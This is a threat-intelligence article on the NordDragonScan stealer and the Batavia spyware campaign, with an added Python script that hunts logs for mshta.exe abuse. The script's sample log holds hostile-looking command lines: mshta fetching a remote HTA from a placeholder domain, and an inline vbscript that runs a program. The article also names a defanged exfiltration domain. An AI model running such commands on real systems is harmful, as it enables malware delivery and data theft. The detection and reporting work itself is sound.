Security researchers have identified a data-harvesting tool called NordDragonScan that targets Windows systems. The malware was analysed by Cara Lin of Fortinet's FortiGuard Labs, who traced related activity back to July 2024. Rather than relying on novel exploits, it chains ordinary Windows components that are already present on the host.
NordDragonScan is delivered through a malicious Windows shortcut (LNK) file that launches a remotely hosted HTML Application (HTA). The HTA executes under the legitimate Microsoft host process mshta.exe, so the stage runs in the background under a signed, trusted binary while the user sees nothing unusual; from there it gathers private information without the victim's awareness.
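The LNK-to-HTA-to-mshta.exe chain above is a living-off-the-land pattern that is easy to hunt for in process-creation telemetry: mshta.exe should rarely, if ever, be handed a remote URL or an inline script on the command line, and when it is spawned by the user's shell that is consistent with someone double-clicking a shortcut. The following detection logic is an added example written for this article, not code from the Fortinet report or the malware itself. The log lines are constructed for the example in a hypothetical key="value" format; the lure domain is a placeholder, and the generic mshta checks (remote URL, javascript:/vbscript: inline script) go slightly beyond the specific chain described on the page.

```python
"""Hunt process-creation events for mshta.exe launching remote or inline HTA content."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample events in a hypothetical key="value" line format
# (not logs from the original report; the domain is a placeholder).
SAMPLE_LOG = r"""
ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\mshta.exe" CommandLine="mshta.exe https://example-lure.invalid/contract.hta"
ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\mshta.exe" CommandLine="mshta.exe C:\Program Files\Vendor\setup.hta"
ParentImage="C:\Windows\System32\services.exe" Image="C:\Windows\System32\svchost.exe" CommandLine="svchost.exe -k netsvcs"
ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\SysWOW64\mshta.exe" CommandLine="mshta.exe vbscript:Close(Execute(CreateObject('Wscript.Shell').Run('calc')))"
"""

REMOTE_URL = re.compile(r"\bhttps?://\S+", re.IGNORECASE)      # mshta fetching an HTA over the network
INLINE_SCRIPT = re.compile(r"\b(javascript|vbscript):", re.IGNORECASE)  # script passed directly on the command line
USER_SHELLS = {"explorer.exe"}  # parents consistent with a user opening a shortcut


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def parse_event(line: str) -> Optional[ProcEvent]:
    """Parse one key="value" line into a ProcEvent; return None if required fields are missing."""
    fields = dict(re.findall(r'(\w+)="([^"]*)"', line))
    if {"ParentImage", "Image", "CommandLine"} - fields.keys():
        return None
    return ProcEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> List[str]:
    """Return the reasons an event looks like abusive mshta.exe use (empty list if benign)."""
    reasons: List[str] = []
    if basename(ev.image) != "mshta.exe":
        return reasons
    if REMOTE_URL.search(ev.command_line):
        reasons.append("mshta fetching remote HTA")
    if INLINE_SCRIPT.search(ev.command_line):
        reasons.append("mshta running inline script")
    # Only add the parent context when something is already suspicious,
    # so a local HTA launched by an installer does not fire on its own.
    if reasons and basename(ev.parent_image) in USER_SHELLS:
        reasons.append("spawned from user shell (consistent with LNK double-click)")
    return reasons


def hunt(log_text: str) -> List[dict]:
    """Run classify() over every parseable line and collect the hits."""
    hits = []
    for line in log_text.strip().splitlines():
        ev = parse_event(line)
        if ev is None:
            continue
        reasons = classify(ev)
        if reasons:
            hits.append({"command_line": ev.command_line, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(hit["command_line"])
        for reason in hit["reasons"]:
            print("   -", reason)
```

Run against the constructed sample, the first and fourth lines are flagged (remote URL and inline script respectively, both spawned from explorer.exe) while the locally installed HTA and the unrelated svchost.exe event are ignored. In a real deployment the same predicates map directly onto a Sysmon Event ID 1 or EDR process-creation query; the parent-process check is what separates a user-triggered shortcut from an administrator's scripted use of mshta.exe.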
As Lin explains, once installed the malware scans the host for sensitive information and carries out further malicious actions.
“Once installed, NordDragonScan examines the host and copies documents, harvests entire Chrome and Firefox profiles, and takes screenshots,” – Cara Lin
The malware steals documents, including PDFs, and takes screenshots of the infected device. It also copies complete user profile directories from both Chrome and Firefox, which hold saved logins, cookies and browsing history, so a single collection run yields far more than loose files.
Kaspersky's separate report on the Batavia spyware campaign, which targeted Russian organizations, gives a sense of the scale of this kind of operation: over roughly one year, more than 100 users across several dozen organizations received its phishing emails. Those emails disguise the malicious link as contract paperwork to bait recipients into clicking.
“The targeted attack begins with bait emails containing malicious links, sent under the pretext of signing a contract,” – Kaspersky
Once the victim follows the link and runs the delivered file, the spyware starts in the background and exfiltrates a system inventory alongside the documents: installed programs, drivers and operating system components.
“As a result of the attack, Batavia exfiltrates the victim’s documents, as well as information such as a list of installed programs, drivers, and operating system components,” – Kaspersky
Kaspersky's analysis adds that the harvested data is sent to the attacker-controlled domain ru-exchange[.]com. After the upload, the malware downloads a further, as-yet-unidentified executable that acts as a fourth-stage payload, extending the attack chain and keeping a foothold on the compromised system.